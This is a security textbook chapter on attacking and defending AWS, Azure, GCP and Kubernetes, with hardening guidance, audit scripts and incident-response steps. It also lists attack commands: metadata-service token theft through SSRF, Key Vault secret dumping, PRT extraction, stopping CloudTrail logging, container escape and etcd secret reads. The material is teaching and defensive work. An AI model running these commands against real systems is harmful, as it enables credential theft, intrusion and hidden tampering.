Chapter 20: Cloud Attack and Defense
Overview
Cloud environments have transformed the attack surface from a defined perimeter into a fluid, API-driven ecosystem spanning multiple providers, accounts, and services. Cloud attacks exploit identity misconfigurations, overprivileged service principals, publicly exposed storage, and vulnerable serverless functions — often without deploying a single piece of malware. This chapter provides a comprehensive treatment of cloud attack techniques across AWS, Azure, and GCP, paired with corresponding detection and hardening strategies, native security services, and the shared responsibility model.
Learning Objectives
By the end of this chapter, students SHALL be able to:
- Describe the shared responsibility model and its security implications across IaaS, PaaS, and SaaS
- Enumerate and exploit common cloud misconfigurations in AWS, Azure, and GCP
- Implement cloud-native detection using CloudTrail, Azure Monitor, and GCP Audit Logs
- Design secure cloud architectures using the principle of least privilege and defense-in-depth
- Perform cloud incident response and forensics across major providers
- Assess container and Kubernetes security posture
Prerequisites
- Familiarity with at least one cloud provider (AWS, Azure, or GCP)
- Understanding of IAM concepts (users, groups, roles, policies)
- Basic networking (VPC, subnets, security groups, firewalls)
Why This Matters
The Verizon DBIR 2024 found that misconfigured cloud storage has exposed billions of records. The top 5 AWS, Azure, and GCP misconfigurations are exploited within hours of deployment by automated scanner bots. In 2023, the MOVEit zero-day, Microsoft Exchange Online breach (Storm-0558), and CircleCI credential theft all originated from cloud control plane compromises. Cloud-native attacks often leave no malware footprint — pure identity abuse against APIs.
20.1 Shared Responsibility Model
```mermaid
graph TB
    subgraph "Customer Responsibility"
        D[Data]
        A[Applications]
        OS[Guest OS\nPatching]
        NET[Network Config\nSecurity Groups]
        IAM[IAM / Identity]
    end
    subgraph "Shared"
        CONF[Configuration\nof Managed Services]
    end
    subgraph "Cloud Provider Responsibility"
        PHYS[Physical Security\nof Data Centers]
        HW[Hardware\n& Hypervisor]
        NETF[Network\nFoundation]
        PLAT[Managed Service\nPlatform]
    end
    style D fill:#e63946,color:#fff
    style A fill:#e63946,color:#fff
    style OS fill:#e63946,color:#fff
    style NET fill:#e63946,color:#fff
    style IAM fill:#e63946,color:#fff
    style CONF fill:#f4a261,color:#000
    style PHYS fill:#2d6a4f,color:#fff
    style HW fill:#2d6a4f,color:#fff
    style NETF fill:#2d6a4f,color:#fff
    style PLAT fill:#2d6a4f,color:#fff
```
The most attacked layer is IAM — which is entirely customer-managed. Cloud providers secure the infrastructure; customers are responsible for who can access it and what they can do.
20.2 AWS Security
20.2.1 AWS Attack Techniques
1. Credential Exposure
```bash
# Detect exposed credentials in code
trufflehog github --org=TargetOrg --only-verified
# Validate credentials
aws sts get-caller-identity --profile exposed
# Enumerate permissions on compromised key
python3 enumerate-iam.py --access-key AKIA... --secret-key SECRET...
```
2. Instance Metadata Service (IMDSv1) Abuse via SSRF
```bash
# SSRF to IMDSv1 (no token required)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2InstanceRole
# Mitigation: Enforce IMDSv2 (requires token)
aws ec2 modify-instance-metadata-options --instance-id i-xxx \
    --http-tokens required --http-put-response-hop-limit 1
```
3. S3 Bucket Misconfiguration
```bash
# Enumerate public buckets for target
aws s3 ls s3://target-bucket --no-sign-request
# S3Scanner — enumerate common bucket names
python3 s3scanner.py --bucket-file bucket_names.txt
# Download all public objects
aws s3 sync s3://exposed-bucket ./local-copy --no-sign-request
```
4. IAM Privilege Escalation
```bash
# Pacu — AWS exploitation framework
# 40+ privilege escalation methods enumerated by Rhino Security Labs
# Common escalation paths:
# iam:CreatePolicyVersion → replace inline policy with AdministratorAccess
# iam:PassRole + lambda:CreateFunction → create Lambda with Admin role
# iam:PassRole + glue:CreateDevEndpoint → attach Admin role to Glue endpoint
# sts:AssumeRole → assume role with higher privileges
# Manual check
aws iam list-policies --scope Local | python3 -c "
import sys,json
for p in json.load(sys.stdin)['Policies']:
    print(p['Arn'], p['PolicyName'])"
```
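To review policies for the escalation paths listed above, the following added example (not code from the original chapter or from Pacu) checks a policy document for wildcard actions and for three of the listed action combinations. The sample policies and all function names are constructed for illustration, and only `Allow` statements are evaluated.

```python
import fnmatch

# Action combinations taken from the escalation paths listed in this section.
ESCALATION_PATHS = {
    "iam:CreatePolicyVersion": {"iam:CreatePolicyVersion"},
    "iam:PassRole + lambda:CreateFunction": {"iam:PassRole", "lambda:CreateFunction"},
    "iam:PassRole + glue:CreateDevEndpoint": {"iam:PassRole", "glue:CreateDevEndpoint"},
}

def as_list(value):
    """IAM JSON allows a single string or object where a list is expected."""
    return value if isinstance(value, list) else [value]

def allowed_patterns(policy):
    """Lower-cased Action patterns from Allow statements.

    Simplification: Deny statements, NotAction, Resource and Condition are
    ignored, so a finding means 'review this', not 'exploitable'."""
    patterns = []
    for stmt in as_list(policy.get("Statement", [])):
        if stmt.get("Effect") == "Allow" and "Action" in stmt:
            patterns.extend(a.lower() for a in as_list(stmt["Action"]))
    return patterns

def is_granted(patterns, action):
    """True if any pattern (IAM wildcards * and ?) matches the action."""
    return any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns)

def audit_policy(policy):
    """Return wildcard grants and escalation paths enabled by one policy."""
    patterns = allowed_patterns(policy)
    findings = [f"wildcard action: {p}" for p in patterns if "*" in p]
    for path, needed in ESCALATION_PATHS.items():
        if all(is_granted(patterns, action) for action in needed):
            findings.append(f"escalation path: {path}")
    return findings

# Constructed sample policies (not from a real account).
CI_DEPLOY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["iam:PassRole", "lambda:*"], "Resource": "*"}]}
READ_ONLY = {"Version": "2012-10-17", "Statement": {
    "Effect": "Allow", "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::example-bucket/*"}}

if __name__ == "__main__":
    for name, doc in (("ci-deploy", CI_DEPLOY), ("read-only", READ_ONLY)):
        print(name, audit_policy(doc))
```

An identity's effective permissions are the union of all attached policies, so run the check on the merged statements when auditing a user or role rather than a single document.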
5. CloudTrail Manipulation (Defense Evasion)
```bash
# Detect if CloudTrail logging is disabled (T1562.008)
aws cloudtrail get-trail-status --name myTrail
# Attacker would:
aws cloudtrail stop-logging --name myTrail
aws cloudtrail delete-trail --name myTrail
# Detection: AWS Config rule cloud-trail-enabled
# GuardDuty: UnauthorizedAccess:IAMUser/AnomalousBehavior
```
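On the detection side, the following added example (not code from the original chapter) reads CloudTrail records and reports how long each trail was not recording after a successful `StopLogging` or `DeleteTrail`, plus the attempts that were denied. The sample records are constructed, `StartLogging` is included only to close a gap, and the trail is assumed to be named in `requestParameters.name`.

```python
from datetime import datetime

WATCHED = {"StopLogging", "DeleteTrail", "StartLogging"}

def parse_time(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")

def logging_gaps(records):
    """Return (gaps, denied): windows where a trail was not recording, and
    rejected StopLogging/DeleteTrail calls. Trail = requestParameters.name (assumed)."""
    gaps, denied, open_gap = [], [], {}
    relevant = [r for r in records
                if r.get("eventSource") == "cloudtrail.amazonaws.com"
                and r.get("eventName") in WATCHED]
    for rec in sorted(relevant, key=lambda r: parse_time(r["eventTime"])):
        name, when = rec["eventName"], rec["eventTime"]
        trail = (rec.get("requestParameters") or {}).get("name", "unknown")
        actor = rec.get("userIdentity", {}).get("arn", "unknown")
        if "errorCode" in rec:
            if name != "StartLogging":
                denied.append((when, actor, name, rec["errorCode"]))
        elif name == "StartLogging":
            gap = open_gap.pop(trail, None)  # logging resumed: close the window
            if gap:
                gap["end"] = when
                delta = parse_time(when) - parse_time(gap["start"])
                gap["seconds"] = int(delta.total_seconds())
        else:  # StopLogging or DeleteTrail succeeded
            gap = open_gap.get(trail)
            if gap is None:
                gap = {"trail": trail, "actor": actor, "start": when,
                       "end": None, "seconds": None}
                open_gap[trail] = gap
                gaps.append(gap)
            gap["action"] = name
    return gaps, denied

def sample_record(time, name, user, trail, error=None):
    """Constructed sample record using CloudTrail's record field names."""
    rec = {"eventTime": time, "eventSource": "cloudtrail.amazonaws.com",
           "eventName": name, "requestParameters": {"name": trail},
           "userIdentity": {"arn": f"arn:aws:iam::111122223333:user/{user}"}}
    if error:
        rec["errorCode"] = error
    return rec

SAMPLE = [
    sample_record("2026-01-10T03:12:45Z", "StopLogging", "build-bot", "myTrail"),
    sample_record("2026-01-10T03:13:10Z", "DeleteTrail", "build-bot", "myTrail", "AccessDenied"),
    sample_record("2026-01-10T04:02:45Z", "StartLogging", "sec-oncall", "myTrail"),
    sample_record("2026-01-10T05:00:00Z", "DeleteTrail", "build-bot", "auditTrail"),
]

if __name__ == "__main__":
    print(logging_gaps(SAMPLE))
```

A gap with `end` set to `None` means the trail never resumed in the records examined, which is the case to escalate first.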
20.2.2 AWS Defense Architecture
```mermaid
graph TB
    subgraph "Account Level"
        CT[CloudTrail\nAll regions + S3 + KMS]
        CW[CloudWatch\nLogs + Alarms]
        SC[Security Hub\n+ Config Rules]
        GD[GuardDuty\nThreat Detection]
    end
    subgraph "Identity Layer"
        SCM[AWS SCPs\nOrganization Policies]
        PB[Permission Boundaries]
        IA[IAM Access Analyzer]
        MFA[MFA Everywhere\n+ Hardware for Root]
    end
    subgraph "Network Layer"
        VPC[VPC Flow Logs]
        NW[Network Firewall]
        WAF[WAF + Shield]
        SG[Security Groups\nMinimum Access]
    end
    subgraph "Data Layer"
        KMS[KMS Encryption\nAll Data at Rest]
        MAC[Macie\nS3 Data Classification]
        SEC[Secrets Manager\nNo Hardcoded Creds]
    end
    CT --> SIEM[SIEM / Security Analytics]
    CW --> SIEM
    VPC --> SIEM
    GD --> SIEM
    style SIEM fill:#e63946,color:#fff
    style GD fill:#1d3557,color:#fff
    style IA fill:#1d3557,color:#fff
```
20.2.3 AWS Security Best Practices
| Category | Control | Implementation |
|---|---|---|
| Root Account | Disable root access keys | Console only; MFA hardware key |
| IAM | Least privilege policies | IAM Access Analyzer; no wildcard actions |
| Multi-Account | AWS Organizations + SCPs | Deny regions not in use; deny disable of CloudTrail |
| S3 | Block Public Access | Account-level Block All Public Access = ON |
| EC2 | IMDSv2 only | Launch template requirement |
| Secrets | Secrets Manager | Never in environment variables or code |
| Logging | CloudTrail all regions | S3 bucket with MFA delete + Glacier Vault Lock |
| Network | VPC Flow Logs | All VPCs; 90-day retention minimum |
20.3 Azure Security
20.3.1 Azure Attack Techniques
1. Service Principal and Application Registration Abuse
```bash
# Enumerate all service principals
az ad sp list --all | python3 -c "
import sys,json
for sp in json.load(sys.stdin):
    print(sp['displayName'], sp.get('appRoles',''))"
# Find overprivileged app registrations
az role assignment list --all | python3 -c "
import sys,json
for ra in json.load(sys.stdin):
    if 'Owner' in ra.get('roleDefinitionName','') or 'Contributor' in ra.get('roleDefinitionName',''):
        print(ra)"
# Dump secrets from Azure Key Vault (if access)
az keyvault secret list --vault-name target-vault
az keyvault secret show --vault-name target-vault --name DatabasePassword
```
2. Azure AD Pass-the-PRT (Primary Refresh Token)
```powershell
# AADInternals — extract PRT from Azure AD joined device
Import-Module AADInternals
Get-AADIntUserPRTToken
# Use PRT to get access token for any service
Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prt -Resource "https://management.azure.com/"
```
3. Managed Identity Abuse via SSRF
```bash
# SSRF to Azure Instance Metadata Service
curl "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" \
    -H "Metadata: true"
# Use token to enumerate resources
curl -H "Authorization: Bearer $TOKEN" \
    "https://management.azure.com/subscriptions?api-version=2020-01-01"
```
4. Storage Account Misconfiguration
```bash
# Azure Storage Explorer / CLI — access anonymous blobs
az storage container list --account-name targetaccount --auth-mode login
az storage blob list --container-name public-container --account-name targetaccount
# SAS token abuse
# Tokens in URLs, git history, or emails grant direct access
az storage blob list --account-name target --sas-token "?sv=2020-08-04&ss=b&..."
```
20.3.2 Azure Security Controls
| Service | Purpose | Key Features |
|---|---|---|
| Microsoft Defender for Cloud | CSPM + CWPP | Secure Score, threat detection, regulatory compliance |
| Azure Sentinel (Microsoft Sentinel) | SIEM + SOAR | Built-in analytics, incident management, UEBA |
| Azure AD Identity Protection | Identity risk detection | Risky sign-ins, risky users, MFA enforcement |
| Azure Policy | Governance | Deny non-compliant resources at deployment |
| Microsoft Defender for Identity | AD attack detection | Kerberoasting, pass-the-hash, lateral movement |
| Azure Firewall | Network egress control | FQDN filtering, threat intelligence-based filtering |
| Microsoft Entra PIM | JIT privileged access | Time-limited role activation; approval workflows |
20.4 GCP Security
20.4.1 GCP Attack Techniques
```bash
# Enumerate service account permissions
gcloud iam service-accounts list
gcloud projects get-iam-policy PROJECT --flatten="bindings[].members"
# Service account key extraction
gcloud iam service-accounts keys list --iam-account sa@project.iam.gserviceaccount.com
# Note: exported keys grant persistent access — rotate immediately if found
# GCS public bucket enumeration
gsutil ls gs://target-bucket/
curl https://storage.googleapis.com/target-bucket/
# Workload Identity abuse
# If compute instance has service account, query metadata:
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
    -H "Metadata-Flavor: Google"
```
20.4.2 GCP Security Services
| Service | Purpose |
|---|---|
| Security Command Center (SCC) | CSPM, threat detection, vulnerability management |
| Cloud Armor | WAF, DDoS protection |
| VPC Service Controls | API perimeter (prevent data exfiltration) |
| Cloud Audit Logs | Admin activity, data access, system events |
| BeyondCorp Enterprise | Zero-trust access to apps |
| Chronicle | Google's SIEM (petabyte-scale, 12-month retention) |
| Assured Workloads | Compliance (FedRAMP, HIPAA, IL4) |
20.5 Container and Kubernetes Security
20.5.1 Container Attack Surface
```mermaid
graph TB
    subgraph "Container Threats"
        E1[Escape via\nprivileged container]
        E2[Host path\nmount abuse]
        E3[Runtime\nRCE → escape]
        E4[Image with\nembedded malware]
    end
    subgraph "Kubernetes Threats"
        K1[Exposed kubectl\nAPI 6443/8080]
        K2[RBAC\nmisconfiguration]
        K3[Service account\ntoken abuse]
        K4[etcd\ncompromise]
        K5[Dashboard\nexposed]
    end
    subgraph "Supply Chain"
        SC1[Malicious base\nimages]
        SC2[Compromised\nCI/CD pipeline]
        SC3[Dependency\nconfusion]
    end
    style E1 fill:#e63946,color:#fff
    style K1 fill:#e63946,color:#fff
    style K4 fill:#780000,color:#fff
    style SC2 fill:#f4a261,color:#000
```
20.5.2 Kubernetes Attack Techniques
```bash
# Enumerate cluster (from inside a pod)
# If automountServiceAccountToken=true and ClusterAdmin role:
kubectl --token=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token) \
    --server=https://kubernetes.default.svc \
    --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt \
    get secrets --all-namespaces
# Container escape via privileged container
# If running as privileged:
ls /proc/1/root # Can access host filesystem
nsenter --mount=/proc/1/ns/mnt -- /bin/bash
# Mount host path
# If hostPath volume mounted:
chroot /host bash
# Accessing etcd (stores all Kubernetes secrets unencrypted unless encryption at rest enabled)
etcdctl --endpoints=https://127.0.0.1:2379 \
    --cacert=/etc/kubernetes/pki/etcd/ca.crt \
    --cert=/etc/kubernetes/pki/etcd/healthcheck-client.crt \
    --key=/etc/kubernetes/pki/etcd/healthcheck-client.key \
    get / --prefix --keys-only
```
20.5.3 Kubernetes Hardening
```yaml
# Pod Security Standards — enforce restricted profile
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted
---
# Network Policy — default deny all ingress/egress
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
    - Ingress
    - Egress
---
# RBAC — minimal service account permissions
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: app-role
  namespace: production
rules:
  - apiGroups: [""]
    resources: ["configmaps"]
    verbs: ["get", "list"]
    # Only get/list specific configmaps — never wildcard
```
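To find workloads that still meet the preconditions named in 20.5.2 (automounted service account token, privileged container, hostPath volume), the following added example (not code from the original chapter) audits manifests supplied as Python dicts, for instance parsed from `kubectl get ... -o json`. The manifests and function names are constructed for illustration, and a ServiceAccount-level `automountServiceAccountToken` setting is not consulted.

```python
CONTAINER_KEYS = ("containers", "initContainers", "ephemeralContainers")

def pod_spec_of(manifest):
    """Return the pod spec of a Pod, or of a workload embedding a pod template."""
    spec = manifest.get("spec", {})
    if manifest.get("kind") == "CronJob":
        spec = spec.get("jobTemplate", {}).get("spec", {})
    return spec.get("template", {}).get("spec", spec)

def audit_workload(manifest):
    """List the risky settings from section 20.5.2 that a manifest contains."""
    spec = pod_spec_of(manifest)
    findings = []
    # Kubernetes mounts the token unless the field is explicitly false.
    # Simplification: the ServiceAccount object's own setting is not checked.
    if spec.get("automountServiceAccountToken", True):
        findings.append("service account token automounted")
    for vol in spec.get("volumes") or []:
        if "hostPath" in vol:
            path = vol["hostPath"].get("path")
            findings.append(f"hostPath volume {vol.get('name')}: {path}")
    for key in CONTAINER_KEYS:
        for ctr in spec.get(key) or []:
            if (ctr.get("securityContext") or {}).get("privileged") is True:
                findings.append(f"privileged container {ctr.get('name')} ({key})")
    return findings

# Constructed sample manifests (not from a real cluster).
RISKY_DEPLOYMENT = {"kind": "Deployment", "spec": {"template": {"spec": {
    "volumes": [{"name": "host-root", "hostPath": {"path": "/"}}],
    "containers": [{"name": "agent", "securityContext": {"privileged": True}}]}}}}
HARDENED_POD = {"kind": "Pod", "spec": {
    "automountServiceAccountToken": False,
    "volumes": [{"name": "scratch", "emptyDir": {}}],
    "containers": [{"name": "app", "securityContext": {"privileged": False}}]}}

if __name__ == "__main__":
    for name, doc in (("risky", RISKY_DEPLOYMENT), ("hardened", HARDENED_POD)):
        print(name, audit_workload(doc))
```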
20.5.4 Container Security Tools
| Tool | Category | Purpose |
|---|---|---|
| Trivy | Image scanning | CVE detection in container layers and configs |
| Falco | Runtime security | Behavioral anomaly detection (CNCF) |
| Kube-bench | CIS benchmarking | Kubernetes CIS benchmark validation |
| kube-hunter | Penetration testing | Enumerate cluster attack surface |
| OPA Gatekeeper | Policy enforcement | Admission controller for policy-as-code |
| Checkov | IaC scanning | Terraform/Helm/CloudFormation misconfig detection |
| Cosign | Supply chain | Container image signing and verification |
20.6 Cloud Incident Response
20.6.1 Cloud IR Differences from On-Premises IR
| Aspect | On-Premises | Cloud |
|---|---|---|
| Evidence acquisition | Physical disk image | API-based log export |
| Volatile data | Memory dump of physical host | Memory forensics not available for managed services |
| Isolation | Unplug network cable | Modify security group, revoke IAM credentials |
| Log retention | Depends on SIEM | Cloud logs often 90 days default; must export to long-term storage |
| Identity trace | Windows Event IDs | API calls in CloudTrail/Azure Monitor/GCP Audit |
| Lateral movement | Pass-the-hash/ticket | Assume role, token theft |
20.6.2 AWS Incident Response Steps
```bash
# 1. Preserve evidence — export CloudTrail to S3 immediately
aws cloudtrail lookup-events --lookup-attributes AttributeKey=Username,AttributeValue=compromised-user \
    --start-time 2026-01-01T00:00:00Z --end-time 2026-01-15T23:59:59Z
# 2. Isolate compromised IAM entity
# Attach inline deny-all policy
aws iam put-user-policy --user-name compromised-user --policy-name QUARANTINE \
    --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Deny","Action":"*","Resource":"*"}]}'
# Deactivate access keys
aws iam update-access-key --access-key-id AKIA... --status Inactive
# 3. Identify all resources created/modified by compromised identity
aws cloudtrail lookup-events --lookup-attributes AttributeKey=Username,AttributeValue=compromised-user \
    | python3 -c "import sys,json; [print(e['EventName'],e['EventTime'],e.get('Resources','')) for e in json.load(sys.stdin)['Events']]"
# 4. Check for persistence mechanisms
aws iam list-access-keys # Additional keys created?
aws iam list-users # New users created?
aws lambda list-functions # Backdoor functions?
aws cloudformation list-stacks # New infrastructure?
```
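Steps 3 and 4 can be tied together by filtering the `lookup-events` output for the create calls behind each step-4 check. The following is an added example, not code from the original chapter: the sample events and function names are constructed, and the mapping covers only the four checks listed in step 4.

```python
import json
from collections import defaultdict

# (event source, event-name prefix) -> the step-4 listing to re-check.
# Lambda's CloudTrail event names carry an API-version suffix, hence prefixes.
PERSISTENCE = {
    ("iam.amazonaws.com", "CreateAccessKey"): "aws iam list-access-keys",
    ("iam.amazonaws.com", "CreateUser"): "aws iam list-users",
    ("lambda.amazonaws.com", "CreateFunction"): "aws lambda list-functions",
    ("cloudformation.amazonaws.com", "CreateStack"): "aws cloudformation list-stacks",
}

def triage(lookup_output, username):
    """Group the identity's successful create calls by the check they map to."""
    hits = defaultdict(list)
    for ev in lookup_output.get("Events", []):
        if ev.get("Username") != username:
            continue
        detail = json.loads(ev.get("CloudTrailEvent") or "{}")
        if "errorCode" in detail:  # rejected call: nothing was created
            continue
        for (source, prefix), check in PERSISTENCE.items():
            if ev.get("EventSource") == source and ev.get("EventName", "").startswith(prefix):
                hits[check].append({
                    "event": ev["EventName"],
                    "time": ev.get("EventTime"),
                    "source_ip": detail.get("sourceIPAddress"),
                    "resources": [r["ResourceName"] for r in ev.get("Resources", [])
                                  if r.get("ResourceName")],
                })
    return dict(hits)

def sample_event(source, name, resource, user="compromised-user", error=None):
    """Constructed event in the shape `aws cloudtrail lookup-events` returns."""
    detail = {"sourceIPAddress": "198.51.100.23"}
    if error:
        detail["errorCode"] = error
    return {"EventName": name, "EventSource": source, "Username": user,
            "EventTime": "2026-01-10T03:20:00Z",
            "Resources": [{"ResourceType": "constructed", "ResourceName": resource}],
            "CloudTrailEvent": json.dumps(detail)}

SAMPLE = {"Events": [
    sample_event("iam.amazonaws.com", "CreateAccessKey", "svc-backup"),
    sample_event("lambda.amazonaws.com", "CreateFunction20150331", "nightly-sync"),
    sample_event("iam.amazonaws.com", "CreateUser", "helpdesk2", error="AccessDenied"),
    sample_event("iam.amazonaws.com", "CreateUser", "intern", user="alice"),
    sample_event("s3.amazonaws.com", "ListBuckets", "n/a"),
]}

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE, "compromised-user"), indent=2))
```

Each key in the result names the listing command from step 4 to run next, and the `resources` values are the objects to look for in its output.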
20.6.3 Forensic Log Sources by Provider
| Provider | Service | Data | Retention Default |
|---|---|---|---|
| AWS | CloudTrail | API calls, S3 access | 90 days (Event history); unlimited in S3 |
| AWS | VPC Flow Logs | Network traffic metadata | Configurable |
| AWS | GuardDuty | Threat findings | 90 days |
| Azure | Activity Log | Control plane actions | 90 days |
| Azure | Sign-in Logs | Authentication events | 30 days (P2: 90 days) |
| Azure | Audit Logs | Azure AD changes | 30 days (P2: 90 days) |
| GCP | Cloud Audit Logs | Admin activity | 400 days |
| GCP | Data Access Logs | Data reads/writes | 30 days |
| GCP | VPC Flow Logs | Network metadata | Configurable |
20.7 Cloud Security Posture Management (CSPM)
CSPM tools continuously assess cloud configurations against security benchmarks (CIS, NIST, SOC2, PCI, HIPAA).
| Tool | Providers | Key Features |
|---|---|---|
| Prisma Cloud | AWS/Azure/GCP | CSPM + CWPP + CIEM, code-to-cloud |
| Wiz | AWS/Azure/GCP | Agentless, attack path analysis |
| Orca Security | AWS/Azure/GCP | SideScanning, no agents |
| Lacework | AWS/Azure/GCP | Behavioral anomaly + compliance |
| AWS Security Hub | AWS | Native, aggregates findings |
| Microsoft Defender for Cloud | Azure/multi-cloud | Native Azure + multicloud support |
| GCP Security Command Center | GCP | Native GCP CSPM + threat detection |
| Prowler | AWS/Azure/GCP | Open source, 300+ checks |
```bash
# Prowler — open source CSPM
pip3 install prowler
prowler aws --compliance cis_1.5_aws -R arn:aws:iam::123456789:role/ProwlerRole
# ScoutSuite — multi-cloud security auditing
python3 scout.py aws --profile default --report-dir ./report/
```
20.8 Benchmark Controls
| Control ID | Title | Requirement |
|---|---|---|
| Nexus SecOps-CLD-01 | Cloud Account Baseline Security | CIS benchmark Level 1+ for all cloud accounts |
| Nexus SecOps-CLD-02 | IAM Least Privilege | No wildcards in production policies; quarterly access review |
| Nexus SecOps-CLD-03 | Cloud Audit Log Retention | Minimum 12 months in immutable storage |
| Nexus SecOps-CLD-04 | CSPM Deployment | Continuous posture assessment across all cloud accounts |
| Nexus SecOps-CLD-05 | Container Security | Image scanning in CI/CD; runtime detection (Falco) in production |
| Nexus SecOps-CLD-06 | Cloud IR Playbook | Documented cloud incident response procedures tested annually |
Exam Prep & Certifications
Relevant Certifications
The topics in this chapter align with the following certifications:
- AWS Security Specialty — Domains: Infrastructure Security, Data Protection, Incident Response
- AZ-500 — Domains: Azure Security Technologies, Identity Protection, Platform Protection
- CCSP — Domains: Cloud Security Architecture, Data Security, Platform Security
Key Terms
CSPM (Cloud Security Posture Management) — Tools and practices that continuously assess cloud configurations for compliance violations and security misconfigurations.
CWPP (Cloud Workload Protection Platform) — Security for cloud workloads (VMs, containers, serverless) including vulnerability management and runtime protection.
IMDSv2 — Instance Metadata Service version 2 — an AWS improvement that requires a session token to access instance metadata, preventing SSRF-based metadata theft.
Lateral Movement (Cloud) — In cloud environments, lateral movement typically involves assuming IAM roles, stealing service account tokens, or pivoting between accounts in an AWS Organization.
Service Principal — An Azure Active Directory identity used by applications, services, and automation tools to access specific Azure resources with assigned permissions.
VPC Service Controls — A GCP security perimeter that restricts API access to specified Google Cloud services, preventing data exfiltration even if credentials are compromised.